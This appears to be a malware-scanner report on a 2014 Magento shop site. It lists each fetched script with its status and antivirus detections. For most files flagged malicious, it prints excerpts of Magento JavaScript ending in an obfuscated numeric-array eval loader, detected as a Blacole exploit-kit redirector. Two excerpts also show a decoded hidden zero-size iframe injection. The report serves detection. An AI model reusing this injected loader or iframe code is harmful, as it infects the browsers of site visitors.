Request | Server response | Status |
http://emarketingleonardo.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 03 Aug 2014 08:44:14 GMT Location: http://emarketingleonardo.com/magento/ Server: Apache Vary: Accept-Encoding Content-Length: 318 Content-Type: text/html; charset=iso-8859-1
| clean |
http://emarketingleonardo.com/magento/ | 200 OK Content-Length: 18346 Content-Type: text/html | clean |
http://emarketingleonardo.com/magento/js/prototype/prototype.js | 200 OK Content-Length: 137401 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = { Version: '1.6.0.3', Browser: { IE: !!(window.attachEvent && navigator.userAgent.indexOf('Opera') === -1), Opera: navigator.userAgent.indexOf('Opera') > -1, WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1, Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') === -1, MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/) ... 3273 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.hd
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.hd
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-5
- F-Secure
- Exploit.JS.Blacole.BT
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/lib/ccard.js | 200 OK Content-Length: 8188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function validateCreditCard(s) { var v = "0123456789"; var w = ""; for (i=0; i < s.length; i++) { x = s.charAt(i); if (v.indexOf(x,0) != -1) w += x; } j = w.length / 2; k = Math.floor(j); m = Math.ceil(j) - k; c = 0; for (i=0; i<k; i++) { a = w.charAt(i*2+m) * 2; c += a > 9 ? Math.floor(a/10 + a%10) : a; } for (i=0; i<k+m; i++) c
... 3094 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2
... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:- nProtect
- JS:Trojan.Iframer.C
- K7AntiVirus
- Trojan
- Emsisoft
- JS:Trojan.Iframer.C (B)
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframeinject.AB
- MicroWorld-eScan
- JS:Trojan.Iframer.C
- F-Secure
- JS:Trojan.Iframer.C
- F-Prot
- JS/IFrame.QW
- GData
- JS:Trojan.Iframer.C
- Commtouch
- JS/IFrame.QW
- BitDefender
- JS:Trojan.Iframer.C
|
http://emarketingleonardo.com/magento/js/prototype/validation.js | 200 OK Content-Length: 44620 Content-Type: application/javascript | clean |
http://emarketingleonardo.com/magento/js/scriptaculous/builder.js | 200 OK Content-Length: 12185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', THEAD: 'table', TR: 'table' }, node: function(elementName) { elementName = elementName.toUpperCase(); var parentTag = this
... 3259 bytes are skipped ...50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} /*qhk6sa6g1c*/Antivirus reports:- nProtect
- JS:Trojan.Iframer.C
- K7AntiVirus
- Trojan
- Emsisoft
- JS:Trojan.Iframer.C (B)
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframeinject.AB
- MicroWorld-eScan
- JS:Trojan.Iframer.C
- F-Secure
- JS:Trojan.Iframer.C
- F-Prot
- JS/IFrame.QW
- GData
- JS:Trojan.Iframer.C
- Commtouch
- JS/IFrame.QW
- BitDefender
- JS:Trojan.Iframer.C
|
http://emarketingleonardo.com/magento/js/scriptaculous/effects.js | 200 OK Content-Length: 46186 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return
... 3235 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- Tencent
- Js.Trojan-downloader.Iframe.Wozj
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-4
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 38633 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(Object.isUndefined(Effect)) throw("dragdrop.js requires including script.aculo.us' effects.js library"); var Droppables = { drops: [], remove: function(element) { this.drops = this.drops.reject(function(d) { return d.element==$(element) }); }, add: function(element) { element = $(element); var options = Object.extend({ greedy: true, hoverclass: null, tree: false }, arguments[1] || { }); ... 3260 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- Tencent
- Js.Trojan-downloader.Iframe.Eadu
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-4
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/scriptaculous/controls.js | 200 OK Content-Length: 42238 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof Effect == 'undefined') throw("controls.js requires including script.aculo.us' effects.js library"); var Autocompleter = { }; Autocompleter.Base = Class.create({ baseInitialize: function(element, update, options) { element = $(element); this.element = element; this.update = $(update); this.hasFocus = false; this.changed = false; this.active = false; this.index = 0; thi
... 3182 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Tencent
- Js.Trojan-downloader.Iframe.Ssqi
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-5
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/scriptaculous/slider.js | 200 OK Content-Length: 17772 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!Control) var Control = { }; Control.Slider = Class.create({ initialize: function(handle, track, options) { var slider = this; if (Object.isArray(handle)) { this.handles = handle.collect( function(e) { return $(e) }); } else { this.handles = [$(handle)]; } this.track = $(track); this.options = options || { }; this.axis = this.options.axis || 'horizontal'; this.increment = this.options.increme
... 3153 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Trojan.Script
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-4
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/varien/js.js | 200 OK Content-Length: 25673 Content-Type: application/javascript | clean |
http://emarketingleonardo.com/magento/js/varien/form.js | 200 OK Content-Length: 19155 Content-Type: application/javascript | clean |
http://emarketingleonardo.com/magento/js/varien/menu.js | 200 OK Content-Length: 11867 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mainNav = function() { var main = { obj_nav : $(arguments[0]) || $("nav"), settings : { show_delay : 0, hide_delay : 0, _ie6 : /MSIE 6.+Win/.test(navigator.userAgent), _ie7 : /MSIE 7.+Win/.test(navigator.userAgent) }, init : function(obj, level) { obj.lists = obj.childElements(); obj.lists.each(func
... 3225 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.hd
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- Tencent
- Js.Trojan-downloader.Iframe.Htvp
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.hd
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-4
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/mage/translate.js | 200 OK Content-Length: 9038 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Translate = Class.create(); Translate.prototype = { initialize: function(data){ this.data = $H(data); }, translate : function(){ var args = arguments; var text = arguments[0]; if(this.data.get(text)){ return this.data.get(text); } return text; }, add : function() { if (arguments.length > 1) { this.data.set(arguments[0], arguments[1
... 3100 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- JS/Blacole.EB.24
- Avast
- JS:Iframe-CWV [Trj]
- Ad-Aware
- Exploit.JS.Blacole.BT
- Ikarus
- Exploit.JS.Blacole
- Panda
- JS/JavaBlacole.A
- nProtect
- Exploit.JS.Blacole.BT
- K7AntiVirus
- Exploit ( 04c5558f1 )
- Emsisoft
- Exploit.JS.Blacole.BT (B)
- Comodo
- TrojWare.JS.Agent.AM
- CAT-QuickHeal
- JS/BlacoleRef.BV
- K7GW
- Exploit ( 04c5558f1 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.hd
- DrWeb
- JS.IFrame.278
- Microsoft
- Trojan:JS/BlacoleRef.BX
- Kaspersky
- Trojan-Downloader.JS.Iframe.czf
- MicroWorld-eScan
- Exploit.JS.Blacole.BT
- Fortinet
- JS/Iframe.W!tr
- McAfee
- JS/Exploit-Blacole.hd
- NANO-Antivirus
- Trojan.Script.Expack.uvpsi
- ClamAV
- JS.Trojan.Blacole-4
- F-Secure
- Exploit.JS.Blacole.BT
- F-Prot
- JS/IFrame.QW
- AVG
- HTML/Framer
- Norman
- Blacole.HB
- Sophos
- Mal/Iframe-AF
- GData
- Exploit.JS.Blacole.BT
- Commtouch
- JS/IFrame.QW
- BitDefender
- Exploit.JS.Blacole.BT
|
http://emarketingleonardo.com/magento/js/mage/cookies.js | 200 OK Content-Length: 10056 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!window.Mage) var Mage = {}; Mage.Cookies = {}; Mage.Cookies.expires = null; Mage.Cookies.path = '/'; Mage.Cookies.domain = null; Mage.Cookies.secure = false; Mage.Cookies.set = function(name, value){ var argv = arguments; var argc = arguments.length; var expires = (argc > 2) ? argv[2] : Mage.Cookies.expires; var path = (argc > 3) ? argv[3] : Mage.Cookies.path; var domain = (argc > 4) ? argv[4] : Mage.Cook
... 3210 bytes are skipped ...06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);}Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2
... 32997 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:- nProtect
- JS:Trojan.Iframer.C
- K7AntiVirus
- Trojan
- Emsisoft
- JS:Trojan.Iframer.C (B)
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/Iframeinject.AB
- MicroWorld-eScan
- JS:Trojan.Iframer.C
- F-Secure
- JS:Trojan.Iframer.C
- F-Prot
- JS/IFrame.QW
- GData
- JS:Trojan.Iframer.C
- Commtouch
- JS/IFrame.QW
- BitDefender
- JS:Trojan.Iframer.C
|
http://emarketingleonardo.com/magento/index.php/ | 200 OK Content-Length: 18346 Content-Type: text/html | clean |